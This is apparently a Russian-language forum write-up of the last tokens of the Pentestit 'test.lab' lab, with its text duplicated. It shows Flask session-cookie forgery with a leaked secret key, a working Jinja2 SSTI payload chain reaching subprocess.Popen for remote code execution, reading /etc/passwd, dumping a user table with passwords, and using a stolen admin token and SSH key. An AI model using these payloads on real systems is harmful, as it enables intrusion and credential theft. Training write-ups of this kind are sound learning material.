Последний и самый не простой рывок в сторону коллекционирования оставщихся 3 токенов.
Глубоко вздохнули и погнали...
API Token
Натыкаемся еще на один упущенный айпишник: 172.16.2.16
Думаем, что можно сделать.
Нашли 2 странички: auth и search в 405 ошибке...
Странно, что ответ получаем разный, возможно сетка в очередной раз захлебывается.
Не забываем использовать все подручные инструменты (мне иногда сподручнее Acunetix Tools)
Нам нужен ключик лицензии (русский язык все же не всю суть отражает). Будем искать.
Есть неплохая мысль которую сгенерил на днях
Для работы с кукарями пользуйтесь лисой (Mozilla Firefox) - F12 - сеть или
скриптом noraj/flask-session-cookie-manager :
ну или
и вставим в результат:
и мы получили ключики:
Бежим немедленно на API сервис вставлять их, но перед нами встает большая загадка, как вставить ключики в
А еще мы понимаем, что в куках есть SSTI уязвимость:
хз как, но ваф блочит тэг
Кайра пробился в куки:
По этой статье https://github.com/swisskyrepo/PayloadsAllTheThings ищем Jinja2 - Remote Code Execution via reverse shell и находим, что с помощью
Подставляем вывод в куки и видим:
Далее дампим вывод в файл и ищем индекс интересных библиотек.
(find.py)
Вывод:
Видим, что у нас есть subprocess.Popen значит можем сделать RCE. Для начала, запишем команду вывода /etc/passwd в конфиг и включим его в глобальный конфиг:
Подставляем куки, и видим что процесс выполнился:
Попробуем включить конфиг:
Пробуем обратится к нашему параметру,
и вуаля RCE!
Видим юзера flask-api:x:1001:1001::/var/www/api:/bin/false и пробуем посмотреть его файлы:
В дело включился
Дальше рыскаем по серваку, что там еще есть.
Снова подгружаем наш конфиг, и пробуем обратиться к нашей переменной. Крутяк, нашли файл токен
Теперь прочитаем:
Снова подгружаем наш конфиг, и пробуем обратиться к нашей переменной.
Задание выполнено и флаг у нас:
Tips - ищите токен, он в
Меня лично к этому жизнь не готовила, забираю свои слова - этот токен был намного сложнее всех тех, которые мы уже взяли...
________________________________________
У нас осталось 2 токена: Admin и Image
________________________________________
ADMIN Token
Заблудился где-то на уровне хоста 172.16.1.25, который так и называется admin.test.lab, но для коннекта по SSH нужен ключик, мы его нашли но пока коннект не обеспечен. Есть мысли, что этот хост судя по найденным данным в SIEM имеет клиента для сием, может через него попробовать подрубиться или запросами получить данные, а может ранее найденные сертификаты на хостах с SSH и есть ключ к которому нужно сделать пару. Еще будем пробовать найти зацепки на хосте my.test.lab...
Пробуя найти информацию на хосте my.test.lab используя RCE через куки, нашли много информации, пытались ее вытаскивать, но как Вы понимаете без прямого доступа постоянно формируя куки - это сравни безумия.
Кайрат вытащил все таки эту api.db:
Вытащил таблицы:
Нашли скрипт api.run.py, в котором находим интересные строки:
И тут, снова, Кайрат выдает нам сюрприз:
В коде просят токен в качестве куки, и если токен от админа качается файл:
Вот, что животворящие знания питона вытворяют. Гениально, Кайрат!
А там архивчик с ключиком! Это именно то, что мы так долго искали. Это скорее всего как раз ключ для подключения к хосту admin.test.lab. Пробуем...
Сначала сформируем правильный ключик, дадим на него права
Затем пробуем:
Нужны корректные права. попробуем по имени хоста.:
Пробуем менять права:
Затем меняем права на своего sshd клиента и так далее...
Стоит предположить, что скорее всего ключ не полный, нам нужно подобрать алгоритм ключа. Пойдем в SIEM и посмотрим в логах, мы помним, что там был этот хост.
Еще раз обращаем внимание на содержание оригинала ключа из архива token.gz и видим, etc/id_rsa
Создаем такую папку у себя, если ее нет и даем на нее права.
Делаем небольшие корректировки в ключе:
Пробуем снова:
И опять ничего хорошего...
В итоге в голову
УРАААА товарищи!
Рыскать бессмысленно, права урезаны, давайте глянем на authorized_keys
________________________________________
У нас остался последний токен - IMAGE Token
________________________________________
Image токен либо кроется в найденных QR картинках (Barcode), которые по факту были расшифрованы как support_team, либо в лошадках, чего я там не нашел, в потерянном на сайте изображении или в изображении которое мы еще не видели. Но могу предположить, что это стеганография и это именно лошадки, но все известные мне пути вытаскивания информации с фото-стеганографии не идут в счет, т.к. помним, что все великие умы взявшие 15 из 16 токенов в первую неделю, около 10-15 дней бились в конвульсиях чтобы найти этот токен!
Не стану отражать весь процесс поиска используя XNView, strings, steghide, ImageSpyer, архиваторы и мой любимый инструмент - Stegsolve.jar используя вымещение всех альфа каналов и т.п.
Я этих пони и в хвост и в гриву стегсолвил - ну нету в них ничего, реально для отвода глаз видимо. Небольшой типс тем, кто только услышал что такое стеганография - старайтесь обращать в первую очередь внимание на большие изображения, а так же замечайте любые странности на размер и разрешение, а так же тут была статья (найду залинкую).
Вспоминаем, какие еще у нас есть изображения - Barcode их аж 4 штуки. Давайте прогоним их в Stegsolve.jar:
в первом изображении support.png видим смещение офсета в 4 из 60 вариаций.
во втором изображении support.png нет смещения офсета из 599 вариаций.
в третьем изображении support.png смещение офсета в 4 из 220 вариаций.
в четвертом изображении support.png смещение офсета в 3 из 75 вариаций.
Пытаемся понять закономерность и логику, подставляя каждый полученный результат в онлайн баркод ридеры.
Понимаем, что 3 из 4 изображений имеют смещения в 1 шаг и в процессе режут изображение под типом flattermarken. Да, кстати нам этот типс дал @Kemmio
У нашего товарища
Если image берется по flattenmarke, то это в баркоде который mini pdf417
Если убрать все лишнее получатся такие линии:
Насколько я понял Flattenmarken разбивает изображение на равные куски для каждого закодированного числа
И если 1111 это
то 1311 это
Сместили на 3 пикселя из-за значения цифры.
В генераторе который я нашел в интернете, изображение получается шириной кратной 18, но в баркоде ширина 220.
На этом изыскания завершились...
Итак, звонок другу у нас был, давайте попросим подсказку - помощь зала!
Помните, что мы не одни в этом жутком мире, есть товарищи и коллеги по цеху.
В целом идея в следующем: Нам нужно написать скрипт отчищающий все от мусора, потом циклом разобрать очищая от пустышек в виде 255,255,255 - обрезать содержимое очищая от нулей и по-буквенно заполнить вывод. Кратко: Белые -> черные, черные -> трэш и заполняем, а потом HEX...
Вот вывод одного из кодированных изображений такой:
Делаем чистку и получаем:
Брюки превращаются:
Немного по играясь скажу - что мы и Вы на верном пути, токен ТУТ, он где-то рядом! Автор скрипта очень хороший и отзывчивый d3cart который делал его по наводкам нашего очень хорошего товарища и форумчанина взявшего 2 место в лабаратории @BadBlackHat да и скрипт не дам, не просите!
________________________________________
Заключение:
В целом я очень доволен нашим результатом, меньше месяца и мы победили ее, я завершил последний токен 14-м!
Хочу пожелать организаторам никогда не останавливать эту пищу для мозга, которая так нужна всем молодым и растущим безопасникам, аналогов которой нет в просторах интернета, за что команде Pentestit спасибо! Но я бы хотел конечно видеть в личном кабинете хотя-бы занимаемое место.
Так же, хотел отметить, что неважно насколько Вы считаете себя умным или наоборот, помните - только команда специалистов может привести к верному результату, ведь Вы никогда не будете подготовлены во всех областях сразу. Как и команда из Codeby взявшая 2-5 места, мы и наши новые друзья с России, Казахстана, Белоруссии только сплочившись нашли различные варианты решений имея разные взгляды на задачи. Еще раз большое спасибо
Ну и Вам, кто дочитал все эти умозаключения до конца большое спасибо, растите умственно, становитесь безопаснее с нами... да и совсем забыл, Соблюдайте законодательство, никогда не используйте свои навыки во вред и злонамеренно и эта статья лишь прохождение лабораторной работы и написана для ознакомления. Надеюсь Вам понравилось прохождение и разбор всех тасков и Вы отблагодарите меня за старания и труд
Ну и напоследок, не думайте, что это так сложно, как Выучить C++ за 21 день. Всегда стремитесь и Вас всегда будет ждать успех!
Статья взята с https://securixy.kz
Глубоко вздохнули и погнали...
API Token
Натыкаемся еще на один упущенный айпишник: 172.16.2.16
Bash:
Starting Nmap 7.70 ( https://nmap.org ) at 2019-01-06 02:04 Oaio?aeuiay Acey (ceia)
Nmap scan report for 172.16.2.16
Host is up (0.20s latency).
Not shown: 999 filtered ports
PORT STATE SERVICE
8000/tcp open http-alt
Nmap done: 1 IP address (1 host up) scanned in 197.34 secondsДумаем, что можно сделать.
Bash:
.\dirsearch.py -u http://172.16.2.16:8000 -e php,txt,bak,json,html,log,conf,cfg,ini,xls,doc,phtml -x 301,403,503,302 --random-agent
_|. _ _ _ _ _ _|_ v0.3.8
(_||| _) (/_(_|| (_| )
Extensions: php, txt, bak, json, html, log, conf, cfg, ini, xls, doc, phtml | Threads: 10 | Wordlist size: 10148
Target: http://172.16.2.16:8000
[02:51:29] Starting:
[02:53:16] 405 - 178B - /auth
[02:54:56] 405 - 178B - /search
Task CompletedНашли 2 странички: auth и search в 405 ошибке...
Bash:
curl -o- 'http://172.16.2.16:8000/auth'
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<title>405 Method Not Allowed</title>
<h1>Method Not Allowed</h1>
<p>The method is not allowed for the requested URL.</p>
Bash:
curl -o- 'http://172.16.2.16:8000/search'
curl: (7) Failed to connect to 172.16.2.16 port 8000: Connection refusedНе забываем использовать все подручные инструменты (мне иногда сподручнее Acunetix Tools)
Нам нужен ключик лицензии (русский язык все же не всю суть отражает). Будем искать.
Есть неплохая мысль которую сгенерил на днях
Ссылка скрыта от гостей
- нужно играть с куками. Мне кажется, что на хосте my.test.lab есть еще что-то, чего мы не видели. Нам в итоге не удалось раскрутить SSTI на RCE в браузере, но можем пробовать под админом зайти или использовать куки.Для работы с кукарями пользуйтесь лисой (Mozilla Firefox) - F12 - сеть или
Ссылка скрыта от гостей
еще можете бурпом или плагином для иного браузера.
скриптом noraj/flask-session-cookie-manager :
Bash:
python2 session_cookie_manager.py encode -s 'UGhldmJoZj8gYWl2ZnZoei5wYnovcG5lcnJlZg==' -t '{"role": u"admin"}'
Bash:
python2 session_cookie_manager.py encode -s 'UGhldmJoZj8gYWl2ZnZoei5wYnovcG5lcnJlZg==' -t '{"role": u"<a href=\"#\">asd</a>"}'и мы получили ключики:
Бежим немедленно на API сервис вставлять их, но перед нами встает большая загадка, как вставить ключики в
http://172.16.2.16:8000/auth POST запросами и другими не выходит.А еще мы понимаем, что в куках есть SSTI уязвимость:
хз как, но ваф блочит тэг
<?php ?> и как его обойти пока что загадка...Кайра пробился в куки:
По этой статье https://github.com/swisskyrepo/PayloadsAllTheThings ищем Jinja2 - Remote Code Execution via reverse shell и находим, что с помощью
''.__class__.__mro__[1].__subclasses__()[/B] можно посмотреть все подключенные классы.
Bash:
python2 session_cookie_manager.py encode -s 'UGhldmJoZj8gYWl2ZnZoei5wYnovcG5lcnJlZg==' -t '{"role": u"{{ \"\".__class__.__mro__[1].__subclasses__() }}"}'
Подставляем вывод в куки и видим:
Далее дампим вывод в файл и ищем индекс интересных библиотек.
(find.py)
Вывод:
Bash:
python find.py open
<class 'urllib.request.URLopener'> 248
<class 'subprocess.Popen'> 413
Видим, что у нас есть subprocess.Popen значит можем сделать RCE. Для начала, запишем команду вывода /etc/passwd в конфиг и включим его в глобальный конфиг:
Bash:
python2 session_cookie_manager.py encode -s 'UGhldmJoZj8gYWl2ZnZoei5wYnovcG5lcnJlZg==' -t '{"role": u"{{ \"\".__class__.__mro__[1].__subclasses__()[413](\"echo \\\"MY_ETC_PWD=open(\\\\\\\"/etc/passwd\\\\\\\").read()\\\" > /tmp/drrr123.cfg\", shell=True) }}"}'
Подставляем куки, и видим что процесс выполнился:
Попробуем включить конфиг:
{{ config.from_pyfile('/tmp/drrr123.cfg') }}Пробуем обратится к нашему параметру,
{{config["MY_ETC_PWD"]}}и вуаля RCE!
Видим юзера flask-api:x:1001:1001::/var/www/api:/bin/false и пробуем посмотреть его файлы:
Bash:
python2 session_cookie_manager.py encode -s 'UGhldmJoZj8gYWl2ZnZoei5wYnovcG5lcnJlZg==' -t '{"role": u"{{ \"\".__class__.__mro__[1].__subclasses__()[413](\"echo \\\"import os;MY_OS_LIST_DIR=os.listdir(\\\\\\\"/var/www/api/\\\\\\\")\\\" > /tmp/drrr124.cfg\", shell=True) }}"}'
В дело включился
Ссылка скрыта от гостей
и пробился благодаря статье
Ссылка скрыта от гостей
Bash:
import os MY_BLA = os.listdir('.')Идеально!
Дальше рыскаем по серваку, что там еще есть.
Прокся? это интересно, но видимо не для нас.<Config {&//39;MY_OPEN': &//39;root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\nbin:x:2:2:bin:/bin:/usr/sbin/nologin\nsys:x:3:3:sys:/dev:/usr/sbin/nologin\nsync:x:4:65534:sync:/bin:/bin/sync\ngames:x:5:60:games:/usr/games:/usr/sbin/nologin\nman:x:6:12:man:/var/cache/man:/usr/sbin/nologin\nlp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin\nmail:x:8:8:mail:/var/mail:/usr/sbin/nologin\nnews:x:9:9:news:/var/spool/news:/usr/sbin/nologin\nuucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin\nproxy:x:13:13
Снова подгружаем наш конфиг, и пробуем обратиться к нашей переменной. Крутяк, нашли файл токен
Теперь прочитаем:
Bash:
python2 session_cookie_manager.py encode -s 'UGhldmJoZj8gYWl2ZnZoei5wYnovcG5lcnJlZg==' -t '{"role": u"{{ \"\".__class__.__mro__[1].__subclasses__()[413](\"echo \\\"MY_API_READED=open(\\\\\\\"/var/www/api/token.txt\\\\\\\").read()\\\" > /tmp/drrr125.cfg\", shell=True) }}"}'
Снова подгружаем наш конфиг, и пробуем обратиться к нашей переменной.
Задание выполнено и флаг у нас:
Tips - ищите токен, он в
/var/www/api/token.txtМеня лично к этому жизнь не готовила, забираю свои слова - этот токен был намного сложнее всех тех, которые мы уже взяли...
________________________________________
У нас осталось 2 токена: Admin и Image
________________________________________
ADMIN Token
Заблудился где-то на уровне хоста 172.16.1.25, который так и называется admin.test.lab, но для коннекта по SSH нужен ключик, мы его нашли но пока коннект не обеспечен. Есть мысли, что этот хост судя по найденным данным в SIEM имеет клиента для сием, может через него попробовать подрубиться или запросами получить данные, а может ранее найденные сертификаты на хостах с SSH и есть ключ к которому нужно сделать пару. Еще будем пробовать найти зацепки на хосте my.test.lab...
Пробуя найти информацию на хосте my.test.lab используя RCE через куки, нашли много информации, пытались ее вытаскивать, но как Вы понимаете без прямого доступа постоянно формируя куки - это сравни безумия.
Кайрат вытащил все таки эту api.db:
http://my.test.lab/?q={{config["MY_APP"]}}
Вытащил таблицы:
Bash:
sqlite> .tables
alembic_version user
sqlite> select * from user;
1|user1|z8ld5F9DPyomobF9U6mmG0c5EvsMsmOY|xQfnwpmfSunRXdgz63UVwgDnFSbFPFCY
2|admin|PasswordForValidation__fk3n5fcaa|sstQrqwhjA84GWvVOAzKH8cD1xfMdfaH
3|user3|eN5tT6IqYqT2KI7yMqIPUpjvh2MeZgR4|XsKmbCs55LlGcOr7rzsYT2EQuNPcvLBN
4|user4|IK1rXC0dL6vQzj59z8OmXYWuHkO8yih7|pVhB854TZHSqjtI32UwRSgRyRIFj5siG
sqlite> select * from alembic_version
...> ;
sqlite>Нашли скрипт api.run.py, в котором находим интересные строки:
И тут, снова, Кайрат выдает нам сюрприз:
В коде просят токен в качестве куки, и если токен от админа качается файл:
Bash:
curl -X POST -v -b 'token=PasswordForValidation__fk3n5fcaa' 172.16.2.16:8000/search -o token.gz
* Trying 172.16.2.16...
* TCP_NODELAY set
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0* Connected to 172.16.2.16 (172.16.2.16) port 8000 (0)
> POST /search HTTP/1.1
> Host: 172.16.2.16:8000
> User-Agent: curl/7.62.0
> Accept: */*
> Cookie: token=PasswordForValidation__fk3n5fcaa
>
0 0 0 0 0 0 0 0 --:--:-- 0:00:04 --:--:-- 0< HTTP/1.1 200 OK
< Server: nginx
< Date: Mon, 07 Jan 2019 15:57:02 GMT
< Content-Type: application/octet-stream
< Content-Length: 1524
< Connection: keep-alive
< Last-Modified: Thu, 13 Dec 2018 15:34:01 GMT
< Cache-Control: public, max-age=43200
< Expires: Tue, 08 Jan 2019 03:57:02 GMT
< ETag: "1544715241.716-1524-1047725766"
<
{ [1524 bytes data]
100 1524 100 1524 0 0 324 0 0:00:04 0:00:04 --:--:-- 339
* Connection 0 to host 172.16.2.16 left intactВот, что животворящие знания питона вытворяют. Гениально, Кайрат!
А там архивчик с ключиком! Это именно то, что мы так долго искали. Это скорее всего как раз ключ для подключения к хосту admin.test.lab. Пробуем...
Сначала сформируем правильный ключик, дадим на него права
Bash:
chmod 777 admin.keyЗатем пробуем:
Bash:
ssh -i admin.key 172.16.1.25 -p22
root@172.16.1.25: Permission denied (publickey).Нужны корректные права. попробуем по имени хоста.:
Bash:
ssh -i admin.key admin.test.lab -p22
The authenticity of host 'admin.test.lab (172.16.1.25)' can't be established.
ECDSA key fingerprint is SHA256:/iQqK4UOhab3e7FBLg1f/SYutsYJCALjp/vqHu3MgGY.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added 'admin.test.lab' (ECDSA) to the list of known hosts.
root@admin.test.lab: Permission denied (publickey).Пробуем менять права:
Bash:
chmod 644 admin.key
ssh -i admin.key 172.16.1.25 -p22
Permission denied (publickey).
chmod 600 admin.key
ssh -i admin.key 172.16.1.25 -p22
Permission denied (publickey).
sudo chmod 644 ~/.ssh/known_hosts
sudo chmod 755 ~/.sshЗатем меняем права на своего sshd клиента и так далее...
Стоит предположить, что скорее всего ключ не полный, нам нужно подобрать алгоритм ключа. Пойдем в SIEM и посмотрим в логах, мы помним, что там был этот хост.
Еще раз обращаем внимание на содержание оригинала ключа из архива token.gz и видим, etc/id_rsa
Создаем такую папку у себя, если ее нет и даем на нее права.
Делаем небольшие корректировки в ключе:
Пробуем снова:
Bash:
ssh -i admin.key 172.16.1.25 -p22
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ WARNING: UNPROTECTED PRIVATE KEY FILE! @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Permissions 0775 for 'admin.key' are too open.
It is required that your private key files are NOT accessible by others.
This private key will be ignored.
Load key "admin.key": bad permissions
root@172.16.1.25: Permission denied (publickey).И опять ничего хорошего...
В итоге в голову
Ссылка скрыта от гостей
приходит умная мысль - пробовать под авторизацией, пробуем admin, root, info и дальше по списку имеющихся у нас учеток - так же. В итоге находим точку входа:
Bash:
cd /
find | grep tokenУРАААА товарищи!
Рыскать бессмысленно, права урезаны, давайте глянем на authorized_keys
________________________________________
У нас остался последний токен - IMAGE Token
________________________________________
Image токен либо кроется в найденных QR картинках (Barcode), которые по факту были расшифрованы как support_team, либо в лошадках, чего я там не нашел, в потерянном на сайте изображении или в изображении которое мы еще не видели. Но могу предположить, что это стеганография и это именно лошадки, но все известные мне пути вытаскивания информации с фото-стеганографии не идут в счет, т.к. помним, что все великие умы взявшие 15 из 16 токенов в первую неделю, около 10-15 дней бились в конвульсиях чтобы найти этот токен!
Не стану отражать весь процесс поиска используя XNView, strings, steghide, ImageSpyer, архиваторы и мой любимый инструмент - Stegsolve.jar используя вымещение всех альфа каналов и т.п.
Я этих пони и в хвост и в гриву стегсолвил - ну нету в них ничего, реально для отвода глаз видимо. Небольшой типс тем, кто только услышал что такое стеганография - старайтесь обращать в первую очередь внимание на большие изображения, а так же замечайте любые странности на размер и разрешение, а так же тут была статья (найду залинкую).
Вспоминаем, какие еще у нас есть изображения - Barcode их аж 4 штуки. Давайте прогоним их в Stegsolve.jar:
в первом изображении support.png видим смещение офсета в 4 из 60 вариаций.
во втором изображении support.png нет смещения офсета из 599 вариаций.
в третьем изображении support.png смещение офсета в 4 из 220 вариаций.
в четвертом изображении support.png смещение офсета в 3 из 75 вариаций.
Пытаемся понять закономерность и логику, подставляя каждый полученный результат в онлайн баркод ридеры.
Понимаем, что 3 из 4 изображений имеют смещения в 1 шаг и в процессе режут изображение под типом flattermarken. Да, кстати нам этот типс дал @Kemmio
У нашего товарища
Ссылка скрыта от гостей
появилась идея отчистить изображение от лишнего мусора.Если image берется по flattenmarke, то это в баркоде который mini pdf417
Если убрать все лишнее получатся такие линии:
Насколько я понял Flattenmarken разбивает изображение на равные куски для каждого закодированного числа
И если 1111 это
то 1311 это
Сместили на 3 пикселя из-за значения цифры.
В генераторе который я нашел в интернете, изображение получается шириной кратной 18, но в баркоде ширина 220.
На этом изыскания завершились...
Итак, звонок другу у нас был, давайте попросим подсказку - помощь зала!
Помните, что мы не одни в этом жутком мире, есть товарищи и коллеги по цеху.
В целом идея в следующем: Нам нужно написать скрипт отчищающий все от мусора, потом циклом разобрать очищая от пустышек в виде 255,255,255 - обрезать содержимое очищая от нулей и по-буквенно заполнить вывод. Кратко: Белые -> черные, черные -> трэш и заполняем, а потом HEX...
Вот вывод одного из кодированных изображений такой:
Делаем чистку и получаем:
Брюки превращаются:
Немного по играясь скажу - что мы и Вы на верном пути, токен ТУТ, он где-то рядом! Автор скрипта очень хороший и отзывчивый d3cart который делал его по наводкам нашего очень хорошего товарища и форумчанина взявшего 2 место в лабаратории @BadBlackHat да и скрипт не дам, не просите!
Заключение:
В целом я очень доволен нашим результатом, меньше месяца и мы победили ее, я завершил последний токен 14-м!
Хочу пожелать организаторам никогда не останавливать эту пищу для мозга, которая так нужна всем молодым и растущим безопасникам, аналогов которой нет в просторах интернета, за что команде Pentestit спасибо! Но я бы хотел конечно видеть в личном кабинете хотя-бы занимаемое место.
Так же, хотел отметить, что неважно насколько Вы считаете себя умным или наоборот, помните - только команда специалистов может привести к верному результату, ведь Вы никогда не будете подготовлены во всех областях сразу. Как и команда из Codeby взявшая 2-5 места, мы и наши новые друзья с России, Казахстана, Белоруссии только сплочившись нашли различные варианты решений имея разные взгляды на задачи. Еще раз большое спасибо
Ссылка скрыта от гостей
,
Ссылка скрыта от гостей
,
Ссылка скрыта от гостей
, d3cart,
Ссылка скрыта от гостей
, ну и конечно же взявшему второе место
Ссылка скрыта от гостей
, с которым познакомились уже по завершению лабаратории. Все ребята проявили отзывчивость, умение работать в комманде и целеустремленность, низкий Вам поклон !!!Ну и Вам, кто дочитал все эти умозаключения до конца большое спасибо, растите умственно, становитесь безопаснее с нами... да и совсем забыл, Соблюдайте законодательство, никогда не используйте свои навыки во вред и злонамеренно и эта статья лишь прохождение лабораторной работы и написана для ознакомления. Надеюсь Вам понравилось прохождение и разбор всех тасков и Вы отблагодарите меня за старания и труд
Ну и напоследок, не думайте, что это так сложно, как Выучить C++ за 21 день. Всегда стремитесь и Вас всегда будет ждать успех!
Статья взята с https://securixy.kz
Последнее редактирование:
